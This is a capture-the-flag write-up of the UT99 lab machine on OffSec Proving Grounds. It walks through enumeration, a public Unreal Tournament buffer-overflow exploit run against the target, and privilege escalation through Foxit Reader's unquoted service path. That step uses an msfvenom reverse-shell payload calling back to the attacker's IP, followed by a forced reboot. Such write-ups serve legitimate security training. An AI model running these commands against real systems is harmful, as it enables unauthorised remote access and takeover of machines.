UT99

Writeup for UT99 from offsec Proving Grounds

Information Gathering

sudo ./nmapAutomator.sh 192.168.175.44 all

We also have IRC open ports at range 6660 to 7000 and 7007.

Service Enumeration

FTP (Port 21)

We tried various standard login credentials but all did not work.

HTTP (Port 80)

Looks like this is running Dragonfly CMS. Manual enumeration led us to conclude this is a dead end.

IRC Ports (6660-7000 and 7007)

We can install HexChat IRC Client using the following command:

apt-get install hexchat -y

We can add a new network and name it however we want. Next, click on the Edit to edit the parameters.

Here, add the IP and port number and click close.

Then, we can use any name we want and click connect.

Here, we click on the server option and click on ChannelList.

Under ChannelList, we can search for channels with users from 1-9999. And we see the channel ut99.

Upon connecting, we see that the Unreal Tournament 99 Game server is hosted on port 7778.

Exploit

Unreal Tournament - Remote Buffer Overflow (SEH)Exploit Database

perl 16145.pl 192.168.175.44 7778 192.168.49.175 80

Privesc

Systeminfo

We manually enumerate and find ftp directory.

Foxit Reader 7.0.6.1126 - Unquoted Service Path Privilege EscalationExploit Database

Looks like this version of Foxit Reader is vulnerable to unquoted service path privesc. We can check if it is installed.

Looks like we have write permissions.

So let's generate our payload names Foxit.exe.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.175 LPORT=80 -f exe -o Foxit.exe

Then, we transfer our file to the target machine.

Next, we can reboot the machine. And we get SYSTEM.

shutdown -r -t 5 && exit